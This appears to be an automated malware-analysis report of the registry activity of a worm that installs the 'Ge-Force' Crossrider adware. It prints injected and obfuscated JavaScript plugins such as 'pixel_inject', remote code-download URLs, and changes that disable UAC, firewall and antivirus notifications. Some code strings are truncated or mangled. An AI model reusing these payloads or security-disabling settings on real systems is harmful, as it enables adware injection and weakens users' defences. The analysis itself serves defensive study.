"JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
[HKCU\Software\Ge-Force\Plugins\38]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/38.js"

[HKCU\Software\Ge-Force\Plugins\263]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTI2ZTQzNDQ1NjU0NTMwMTE3MGMxOTMxMTEwODU0NGU1MTRiMGIwYzFkMTQ1OTRiNTkxNzE1MDcwMDE5MGEwYzA2NTU1YjE1NWYwODA4MTkwNDA1MGEwYzEyNWExZjBjMTc1NzFhMTEwMTRiMDA0NzQzNTg1YTFhMGQ0YjNjM2IzNTI2M2UzYTMwMmEyMDIwMjYzNjI5MzEyOTNkMjYzNjJkMjEyNzNiMjUyMTMzMzYyYTNjMzYzYjRjMDg1ODFlMDI1NjEzMTEwZDU5NTI1NDRmNDA1NzBjMWIwYzU0M2IzYzI3MjQzYjIyM2EzMTMxMmQyMTMxM2IzNzI0MjEzNjJkMzkyNDIxM2MzYjUwMDcwODFhMTcxZDA0MGQwNzU5MjkyYjMyM2IyYzJiM2EzNjJhMjAzMzI2MmUyMDJkMmIzZDI1MmYyODMzMjYyZTNjMzAzZDNiM2IyYTIwMjkyYjUzNDU2OTU4NDk0NDQzNDYxZTAwMDUxOTEwMmQxYjA4NDE1ZTU2NTYxOTFkMTcwODFhNWU0YzRiMTUxMDFmMGEwMjFiMDEwMTUyNDkxNzVhMTAwMjAyMTUwODBkMGIwMDU4MWExNDFkNGMwYjFjMDY0YzEyNDU0NjQwNTAwMTFjNDYzYjNjMjcyNDNiMjIzYTMxMzEyZDIxMzEzYjMzMmMyNTJjMmQzYzJjMjAzYzM3MjMzNjJlMjAyNzI3MzY0YjBmNGExYzA3NGUxOTBhMWM1NDU1NTM1ZDQyNTIxNDExMTc0NTM2M2IyMDM2MzkyNzIyM2IyYTNjMmMzNjNjMjUyNjI0MmUyNzIyMzUyYzNiM2M0MjA1MGQwMjFkMDYxNTAwMDA1ZTNiMjkzNzIzMjYzMDJiM2IyZDI3MjEyNDJiMzgyNzMwMmMyODI4MmYyMTI0MmIyNDNhMjYyYTM2MmQyNzNiMjk1NjVkNjM0MzU4NDk0NDQxMTQxYTAxMTY"

[HKCU\Software\Ge-Force\Plugins\94]
"Version" = "2"

[HKCU\Software\Ge-Force\Plugins\253]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGU2MDdmNDgwNTEyMTUxYjM0MTgxOTQ4NGM0YTRmMzkzZTI4MzMzNTIwM2EzMjJiMzkyMzNlMjMyZTM5MjEzNTI5NDUwZjBmNGUwYTRmMDAwNjQ4NWE2MDY0NDQxMTA3MTQwZDFjMDQzZjBlNGY1YzQxNTk1NDU5NTk2MDdmNDgwNDA4MGQwMjBmMGYzZjM5NTQ1MDRkNDQxNjAyMGYwZTFhMWQ1ODM1MzIwNDA4MzQxMTAzMGQwZjFhMzUxODE0MGQzNDNlNGE0ODRhNTEzNTMyMjUzMzM0MzIzZTM0M2UyNTM1MjUyOTMyM2YzZTM1NWEwODFmNDQwYTBmMDc1NDAyMGIxODFhMTcwMzBhMDg1YzM0M2UyOTI3MjUyNTM5M2YyZjI1MmUzMzM1MzYyYjNiM2EzMjJmMjUzNDNlNGMxNzE4MTkxZDFlMDMxMzU2M2UzNTM2MzgzOTM5M2UzNDI4MmYyNDM4MmEyODI0MjUzYTM1MjQzOTNlMzU1MzA4MWYwOTUwMzkzZTI4MzMyNTI2MzkyNDIzMjkyMzMzMzQzNDM5MzAzODI5MjMyOTM5M2U0ZDEzMDQxMTU3NTE0YTQ2NDY0OTA1MDQxZDU1MmUxNzFlMDg0ZTQ4NDI0ZjBkMTAxZTIyMDMwMDAzNDk0MjVhNDg3ZjE3', 'ujvjmfakaj'); }"

[HKCU\Software\Ge-Force\Plugins\46]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn@"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 13 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"AppPath" = "%Program Files%\Ge-Force"

[HKCU\Software\Ge-Force\Plugins\1]
"Version" = "11"

[HKLM\SOFTWARE\Crossrider]
"Verifier" = "7d6635bb3acc762051a59407230a02ec"

[HKCU\Software\Ge-Force\Plugins\42]
"JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;)"

[HKCU\Software\Ge-Force\Plugins\44]
"Version" = "6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Ge-Force\Plugins\242]
"Name" = "price_gong_m"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nszB8.tmp\{035F0B2B-E198-4B9E-B832-A46269A81ADD}\,"

[HKCU\Software\Ge-Force\Manifest]
"AddressbarURL" = "NA"

[HKCU\Software\Ge-Force\Plugins\78]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/78.js"

[HKCU\Software\Ge-Force\Plugins\17]
"JavaScript" = "if(typeof window!==undefined){/*! * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js * http://sizzlejs.com/ * Copyright 2010, The Dojo Foundation * Released under the MIT, BSD, and GPL Licenses. * * Date: Sat Feb 13 22:33:48 2010 -0500 */var $$jquery;(function(aO,D){var a=function(e,a0){return new a.fn.init(e,a0);},o=aO.jQuery,S=aO.$,ac=aO.document,Y,Q=/^[^)[^>]*$|^#([\w-] )$/,aY=/^.[^:#\[\.,]*$/,az=/\S/,N=/^(\s|\u00A0) |(\s|\u00A0) $/g,f=/^(?:)?$/,b=navigator.userAgent,v,L=false,af=[],aI,av=Object.prototype.toString,ar=Object.prototype.hasOwnProperty,h=Array.prototype.push,G=Array.prototype.slice,t=Array.prototype.indexOf;a.fn=a.prototype={init:function(e,a2){var a1,a3,a0,a4;if(!e){return this;}if(e.nodeType){this.context=this[0]=e;this.length=1;return this;}if(e===body&&!a2){this.context=ac;this[0]=ac.body;this.seÃƒâ€¡Ã‚Â"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Ge-Force\Plugins\183]
"Name" = "tabsWrapper"

[HKCU\Software\Ge-Force\Installer]
"FullVersionForUrl" = "1_35_12_18"

[HKCU\Software\Ge-Force\Plugins\223]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI3ZDc5NTUxMjA1MGQxYzI0MDgxNTU1NGE1NzU4MTkwZDE4MDE0MDU2NTgxMzEzMTQ1ZjBmMDUwMjFiMWQxMzVlMTQxNTFjNTYxZjEyMDgxMDA3MDQ1ODRiNDU0YzVhNDY0ZDRiNDI0NzQxNGY1ZTA5MWUxNDE2MTYxNjE0NTkxMDAyNDYxZjA0MTgxMDEzNGQyODI1MzIyYjIzMjIyOTJiM2UzNDMyMjgyZTNjMzQyNTNmMzczMzM1MzMyNTIyMmMyZTJlMzMzZDI4MmY1MTBmMWM0NDMzMmUzOTJiMzgyMzI0MjgzODNkMjkyMzI1MzgyNzIwMjgzNDMwMzQyOTJlMjU1YjViN2E3ZTU4MTkwZDE4MDEwOTJjMDUxYzU1NDA1MTViMDQwNTBlMDkwNDRhNTg1NTEyMWQwMjVmMGMxMDA0MTExMzFlNWYxYTAzMWM1NTBhMTQwMjFlMGEwNTU2NWQ0NTRmNGY0MDQ3NDU0ZjQ2NGY1OTVlMGEwYjEyMWMxODFiMTU1NzA2MDI0NTBhMDIxMjFlMWU0YzI2MzMzMjI4MzYyNDIzMjUzMzM1M2MzZTJlM2YyMTIzMzUzOTNlMzQzZDMzMjIyZjNiMjgzOTMzMjUyZTVmMTkxYzQ3MjYyODMzMjUzNTIyMmEzZTM4M2UzYzI1MmYzNjJhMjEyNjIyMzAzNzNjMjgyZjU1NTY3YjcwNGUwMTE2MGMxMDE5MTkzMzE1NWI1NjUxNDg0YjQ0N2EwYQ==', 'ywpwzqylqz'); }"

[HKCU\Software\Ge-Force\Plugins\200]
"Version" = "4"

[HKCU\Software\Ge-Force\Plugins\64]
"Name" = "appApiMessage"

[HKCU\Software\Ge-Force\Plugins\4]
"Version" = "5"

[HKCU\Software\Ge-Force\Manifest]
"Manifest" = "NA"

[HKCU\Software\Ge-Force\Update]
"LastCheck" = "1421039414"

[HKCU\Software\Ge-Force\Plugins\123]
"Name" = "intext_adv_m"

[HKLM\SOFTWARE\Ge-Force\IE]
"TotalProfiles" = "1"

[HKCU\Software\InstalledBrowserExtensions\21836\Status]
"Installed" = "1"

[HKCU\Software\Ge-Force\Plugins\182]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/182.js"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 1E DD DC A6 3D CB 28 91 69 85 29 DA 0B A4 28"

[HKCU\Software\Ge-Force\Plugins\37]
"Name" = "IEBrowserEvents"

[HKCU\Software\Ge-Force\Plugins\1]
"Name" = "base"

[HKCU\Software\Ge-Force\Plugins\102]
"Version" = "11"

[HKCU\Software\Ge-Force\Plugins\45]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.tabId=onRequest;window.console.log=appAPI.internal.console.log;console.log=window.console.log;window.console.info=appAPI.internal.console.info;console.info=window.console.info;window.console.warn=appAPI.internal.console.warn;console.warn=window.console.warn;window.console.error=appAPI.internal.console.error;console.error=window.console.error;(function(){function a(e){var c=appAPI.internal.prefs.getChar(e,Crossrider\\onRequest);if(typeof c!==string){return 0;}if(c.length===0){return 0;}c=appAPI.JSON.parse(c);if(typeof c!==object){return 0;}var d=0;for(var b in c){d ;appAPI.internal.callbacks.addListener(onRequest,function(m,g){var n=appAPI.internal.callbacks.onRequest.listenersAdditionalData[g];if(typeof n.code!==string){return;}var f={};var i;if(typeof n.value===undefined){i=undefined;}else{if(n.value===nÃƒâ€°Ã‚Â»"

[HKCU\Software\Ge-Force\Plugins\91]
"JavaScript" = "(function(M){var A=[].slice;var z={};var a=function(ar){if(typeof ar==string&&typeof ar.trim==function){return ar.trim();}return ar==null?:ar.toString().replace(/^\s /,).replace(/\s $/,);};function f(ar){var at=z[ar]={},au,av;ar=ar.split(/\s /);for(au=0,av=ar.length;au
[HKCU\Software\Ge-Force\Plugins\102]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/102.js"

[HKCU\Software\Ge-Force\Plugins\221]
"Version" = "4"

[HKCU\Software\Ge-Force\Installer]
"CodeDownloadDomain" = "http://js.newstatsclientcloud.com"

[HKCU\Software\Ge-Force\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

[HKCU\Software\Ge-Force\Manifest]
"Description" = "Ge-Force"

[HKCU\Software\Ge-Force\Plugins\262]
"Version" = "2"

[HKCU\Software\Ge-Force\Plugins\7]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/7.js"

[HKCU\Software\Ge-Force\Plugins\45]
"Version" = "4"

[HKCU\Software\Ge-Force\Plugins\13]
"Name" = "CrossriderAppUtils"

[HKCU\Software\Ge-Force\Plugins\64]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/64.js"

[HKCU\Software\Ge-Force\Plugins\22]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/22.js"

[HKCU\Software\Ge-Force\Plugins\123]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGQ3ZDZmNDAwNDBjMTkxNDMxMGExYTU1NWM0MjRlMTAxOTEwMTQ0MjU5NTgwZjBjMTgxZDE1MTA0YTE2MTcwMTRiMGUwNTE2MDYxNzRhMWIxOTFhNDkwODFmNTcwNDBhMTAxZDBlMDM0ODA4MWY0NzBjMDIwZDFjNGIxNDE0MGQxZjBiMWYwZDAwMWQwNDUxMTUxNzBlMTEwOTU5M2IyNzM1MjUyOTMxM2YyYTI0MjAyMTJhMjkzMjNlMzYyOTM2MjkyMTIwMjcyNTIyMjQzZDI1M2MzMjNiNDIxNTE3MGYwYTBiMDIxMzFlNTk1YzVlMWExZTA4MDkwZjE3MDEwYjE2NDU0NjQ3NTY1MjJhM2U0YjA2MTYxOTE4MTM1YjNkMzMzYjNmMmIzNzJiMjQzZTIyMjczZTI3MmMzNDM0MjczODM2MmIyNzMzMjc0ZjQ4NmU3MTU0MWYxMjE2MWMwYjM4MTYwODVhNGM1NzQ0MGExODBjMWQxNzVlNTc1OTFlMDgxNjA5MDAxOTRhMGExOTAwNWEwYTBiMDIxMzFlNGEwNzE3MWI1ODBjMTE0MzExMDMxMDAxMDAwMjU5MGMxMTUzMTkwYjBkMDA0NTE1MDUwOTExMWYwYTA0MDAwMTBhNTAwNDEzMDAwNTFjNTAzYjNiM2IyNDM4MzUzMTNlMzEyOTIxMzYyNzMzMmYzMjI3MjIzYzI4MjAzYjJiMjMzNTM5MmIyODI3MzI0MjA5MTkwZTFiMGYwYzA3MGI1MDVjNDIxNDFmMTkwZDAxMDMxNDAyMTY1OTQ4NDY0NzU2MjQyYTVlMGYxNjA1MTYxMjRhMzkzZDJmMmEyMjM3MzcyYTNmMzMyMzMwMzMzOTNkMzQzYjM2MzczYTIzM2QzMzVhNDE2ZTZkNWEwNjFiMTMwNTA1MTYyNDAwNDY0MjU2NDY1NDUxNjYwNQ==', 'vwfblxmddx'); }"

[HKCU\Software\Ge-Force\Plugins\40]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.scope=Consts.SCOPE.PAGE;appAPI.internal.callbacks.setEventHandler(externalConsole,function(a){if(appAPI.dom.isIframe()){return;}var c=a.level;var b=a.text;if(typeof c===undefined){console.error(Received undefined Background console level);return;}if(typeof console[c]===undefined){console.error(Received undefined Background console level);return;}if(typeof b===undefined){console.error(Received undefined Background console text);return;}console[c](b);});appAPI.internal.callbacks.setEventHandler(onBeforeNavigate,function(a){});appAPI.internal.callbacks.setEventHandler(windowOpen,function(a){if(appAPI.dom.isIframe()||!appAPI.isActiveTab()){return;}window.open(a.url,a.name,a.specs,a.replace);});try{if(!appAPI.dom.isIframe()){appAPI.internal.activeTabCounter=0;setInterval(function(){if(appAPI.isActi)"

[HKCU\Software\Ge-Force\Plugins\253]
"Name" = "pixel_inject"

[HKCU\Software\Ge-Force\Plugins\46]
"Name" = "IETimers"

[HKCU\Software\Ge-Force\Plugins\354]
"Name" = "categories"

[HKCU\Software\Ge-Force\Plugins\220]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/220.js"

[HKCU\Software\Ge-Force\Plugins\345]
"Name" = "pluginsVerticals"

[HKCU\Software\Ge-Force\Plugins\91]
"Name" = "monetizationLoader.js"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ge-Force]
"Publisher" = "iWebar"

[HKCU\Software\Ge-Force\Plugins\9]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/9.js"

[HKCU\Software\Ge-Force\Plugins\2]
"Name" = "ie8_fix_1"
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/2.js"

[HKCU\Software\Ge-Force\Plugins\38]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.internal.callbacks.genericEvent=function(e){var d=e.eventContent;if(typeof d===undefined){return;}var a=e.eventName;if(typeof a===undefined){return;}if(typeof appAPI.internal.callbacks[a]===undefined){return;}if(typeof appAPI.internal.callbacks[a].handler!==undefined){var b=appAPI.internal.callbacks[a].handler(d);if(b){return;}}if(typeof appAPI.internal.callbacks[a].listeners===undefined){return;}for(var c in appAPI.internal.callbacks[a].listeners){appAPI.internal.callbacks[a].listeners[c](d,c);}};appAPI.internal.callbacks.addListener=function(b,a,c){if(typeof appAPI.internal.callbacks[b]===undefined){appAPI.internal.callbacks[b]={};appAPI.internal.callbacks[b].listeners={};appAPI.internal.callbacks[b].listenersAdditionalData={};appAPI.internal.callbacks[b].listenersIds=0;appAPI.internal.callbacks[b].numberO"

[HKCU\Software\Ge-Force\Plugins\42]
"Version" = "10"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\Ge-Force\Plugins\350]
"Version" = "1"

[HKCU\Software\Ge-Force\Plugins\47]
"JavaScript" = "(function(){appAPI.ready=function(a){appAPI.resources.isReady(a);};}());var CrossRiderResourcesManager=(function(){var C={appId:(function(){var D=appAPI.appInfo;if(D){return appAPI.appInfo.id;}else{return appAPI.appID;}})(),url:{base:{production:[""\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x73\x6f""

[HKCU\Software\Ge-Force\Plugins\220]
"Name" = "icm_base_m"

[HKCU\Software\Ge-Force\Plugins\242]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/242.js"

[HKCU\Software\Ge-Force\Plugins\14]
"Name" = "CrossriderUtils"

[HKCU\Software\Ge-Force\Plugins\123]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/123.js"

[HKCU\Software\Ge-Force\Plugins\184]
"Version" = "10"

[HKCU\Software\Ge-Force\Plugins\4]
"Name" = "jquery_1_7_1"

[HKCU\Software\Ge-Force\Plugins\195]
"Name" = "icm_convertmedia_m"

[HKCU\Software\Ge-Force\Plugins\102]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MDI2NzUxNTI0MjUyNGUwYzA0MWUwOTM4MDMxZTQwNDg0YzQ2MTgxZTBkMWQ0YjVkNGQxYjQyMDcwMjA4MWYwNzAyNWMwYjFjMGEwYjVmMDkwYjBmMTc1ZDA4MTMxYTA1MDMwOTBiMDQwMTA2NGMxODFmNWIxMzAyMTgwMzFmMTcwZTRmMGYxNjE0MTgyNjMyMmUzMTMwM2QzZjM3MjIyMzNkMjgyMzJkMjcyYTM4MjEzZTJlM2MyOTJlMjEzNzMwMzMyZDM0MzUyNjRiMTAwMjEyMjYwNTEwMWMwZjQ0MzIyZTMxMzAzZDNmMzcyMjIzM2QyODIzMmQyMzIyM2MzYjNlMmIzNDI4MmUyZDQ0MWEwNTAwNGQzNTI2MmUyMzNkMzEyMTNlMmQzNDJmMmIzMjI0MjEyNzIwMzMyZDM0MzUyNjRmNWQ3ODQyNTI0YzQ0NTIwMjBkMTkwMTAxMzcwMDAwNDY0YTRhNWIwNTA1MDYxMjAxNTY0YjVmMDMyNjBlMDMxMDA0MTgxZjNiMTkwNDFmMDI1ZjA2MGUwMTBmMDAxZTQ0MWEwMjFjNWQwMTAwMGUwMjVmMDAxODFiMTAwMTAxMDAwNTE0MDQ0NDEzMWU0ZTExMGExMzAyMGExNTA2NDQwZTAzMTYxMDJkMzMzYjMzMzgzNjNlMjIyMDJiMzYyOTM2MmYyZjIxMzkzNDNjMjYzNzI4M2IyMzNmM2IzMjM4MzYzZDJkNGEwNTAwMWEyZDA0MDUxZTA3NGYzMzNiMzMzODM2M2UyMjIwMmIzNjI5MzYyZjJiMjkzZDJlM2MyMzNmMjkzYjJmNGMxMTA0MTU0ZjNkMmQyZjM2M2YzOTJhM2YzODM2MjcyMDMzMzEyMzJmMmIzMjM4MzYzZDJkNGU0ODdhNGE1OTRkNTE1MDEyMWUxOTAzMTkwNDMwMDk1MzQ4NDI0MzVjNTY3YTE3', 'ymqrbrldpj'); }"

[HKCU\Software\Ge-Force\Manifest]
"SetNewTab" = "false"

[HKCU\Software\Ge-Force\Plugins\64]
"JavaScript" = "(function(){var j=__CR_EMPTY_CHANNEL__;var d=function(e){return(typeof e===object&&e!==null);};var b=function(e){return(!!e&&typeof e===string);};var f=function(l){var e;if(typeof l===function){e=j;}else{if(d(l)&&b(l.channel)){e=l.channel;}else{e=j;}}return e;};var k=function(m,e){var l={wrapperMessage:{message:m,channel:f(e)},toIframes:d(e)?e.toIframes:e};return l;};var i=function(m,e){var l={message:m,channel:f(e)};return l;};var h=function(){var e={};e.addListener=appAPI.message.addListener;e.removeListener=appAPI.message.removeListener;e.toActiveTab=appAPI.message.toActiveTab;e.toAllOtherTabs=appAPI.message.toAllOtherTabs;e.toAllTabs=appAPI.message.toAllTabs;e.toBackground=appAPI.message.toBackground;e.toCurrentTabIframes=appAPI.message.toCurrentTabIframes;e.toCurrentTabWindow=appAPI.message.toCurrentTabWindow;e.toPopup=appAPI.message.toPopup;return e;};var a=function(e){appAPI.message.addListener=function(l,o){var n=null;var m;var p=f(l);if(typeof l===function){n=function(q){if(p===q.channel){e"

[HKCU\Software\Ge-Force\Manifest]
"ThanksUrl" = "NA"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"AppPath" = "%Program Files%\Ge-Force"10?0>0>0?0:>

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm deletes the following registry key(s):

[HKCU\Software\Ge-Force\Plugins\301]
[HKCU\Software\Ge-Force\Plugins\263]
[HKCU\Software\Ge-Force\Plugins\242]
[HKCU\Software\Ge-Force\Plugins\184]
[HKCU\Software\Ge-Force\Plugins\183]
[HKCU\Software\Ge-Force\Plugins\182]
[HKCU\Software\Ge-Force\Plugins\246]
[HKCU\Software\Ge-Force\Plugins\180]
[HKCU\Software\Ge-Force\Plugins\104]
[HKCU\Software\Ge-Force\Plugins\2]
[HKCU\Software\Ge-Force\Plugins\223]
[HKCU\Software\Ge-Force\Plugins\220]
[HKCU\Software\Ge-Force\Plugins\207]
[HKCU\Software\Ge-Force\Plugins\200]
[HKCU\Software\Ge-Force\Plugins\93]
[HKCU\Software\Ge-Force\Plugins\91]
[HKCU\Software\Ge-Force\Plugins\94]
[HKCU\Software\Ge-Force\Plugins\221]
[HKCU\Software\Ge-Force\Plugins\177]
[HKCU\Software\Ge-Force\Plugins\345]
[HKCU\Software\Ge-Force\Plugins\72]
[HKCU\Software\Ge-Force\Plugins\17]
[HKCU\Software\Ge-Force\Plugins\14]
[HKCU\Software\Ge-Force\Plugins\38]
[HKCU\Software\Ge-Force\Plugins\13]
[HKCU\Software\Ge-Force\Plugins\78]
[HKCU\Software\Ge-Force\Plugins\35]
[HKCU\Software\Ge-Force\Plugins\36]
[HKCU\Software\Ge-Force\Plugins\37]
[HKCU\Software\Ge-Force\Plugins\43]
[HKCU\Software\Ge-Force\Plugins\39]
[HKCU\Software\Ge-Force\Plugins\64]
[HKCU\Software\Ge-Force\Plugins\273]
[HKCU\Software\Ge-Force\Plugins\41]
[HKCU\Software\Ge-Force\Plugins\40]
[HKCU\Software\Ge-Force\Plugins\192]
[HKCU\Software\Ge-Force\Plugins\42]
[HKCU\Software\Ge-Force\Plugins\253]
[HKCU\Software\Ge-Force\Plugins\195]
[HKCU\Software\Ge-Force\Plugins\47]
[HKCU\Software\Ge-Force\Plugins\44]
[HKCU\Software\Ge-Force\Plugins]
[HKCU\Software\Ge-Force\Plugins\46]
[HKCU\Software\Ge-Force\Plugins\354]
[HKLM\SOFTWARE\Tempo]
[HKCU\Software\Ge-Force\Plugins\286]
[HKCU\Software\Ge-Force\Plugins\281]
[HKCU\Software\Ge-Force\Plugins\4]
[HKCU\Software\Ge-Force\Plugins\7]
[HKCU\Software\Ge-Force\Plugins\9]
[HKCU\Software\Ge-Force\Plugins\1]
[HKCU\Software\Ge-Force\Plugins\123]
[HKCU\Software\Ge-Force\Plugins\3]
[HKCU\Software\Ge-Force\Plugins\28]
[HKCU\Software\Ge-Force\Plugins\22]
[HKCU\Software\Ge-Force\Plugins\21]
[HKCU\Software\Ge-Force\Plugins\45]
[HKCU\Software\Ge-Force\Plugins\102]

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1616 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "1"

[HKCU\Software\Aas]
"a1_0" = "2892445252"

[HKCU\Software\Aas\695404737]
"35845605" = "476"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DoNotAllowExceptions" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"

[HKCU\Software\Aas\695404737]
"50183847" = "83AD022F944CCF21DDECD41871254667172BA39F3E949513F4CC29B07060AC534912E5BCB155880C2C4326E6FB83E6FA099D4219F6885291D527824C5507229614A07CE2AF035D97263FF7F26AD2ACC9D5D4395D4B8B3109DC5C0C87B31A1505E6E94E08EF20E71B91B96D3856F531DADFD78A894AD6A6C177136C5657B01661"
"43014726" = "0C00687474703A2F2F7777772E6C656479617A696C696D2E636F6D2F6C6F676F2E67696600687474703A2F2F6B73616E64726166617368696F6E2E636F6D2F6C6F676F2E67696600687474703A2F2F7777772E6C6166796572692E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F6B756C7070617375722E636F6D2F6C6F676F2E67696600687474703A2F2F746F616C6C616465706170656C2E636F6D2E61722F696D616765732F6C6F676F2E67696600687474703A2F2F7777772E65636F6C652D7361696E742D73696D6F6E2E6E65742F696E6465785F746F702F6C6F676F2E67696600687474703A2F2F6C617A617265612E726F2F696D616765732F6C6F676F2E67696600687474703A2F2F6B6F6F6E6164616E6365322E636F6D2F696D616765732F6C6F676F2E67696600687474703A2F2F6B75706C752E62656C2E74722F696D616765732F6C6F676F2E67696600687474703A2F2F7777772E6C69646572616E636173706F6C6974696361732E636F6D2E62722F6C6F676F2E67696600687474703A2F2F7777772E6C6567616C62696C676973617961722E636F6D2F696D672F6C6F676F2E67696600687474703A2F2F6C696665636F6D32342E636F2E63632F696D616765732F6C6F676F2E676966"

[HKCU\Software\Aas]
"a3_0" = "17001001"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"

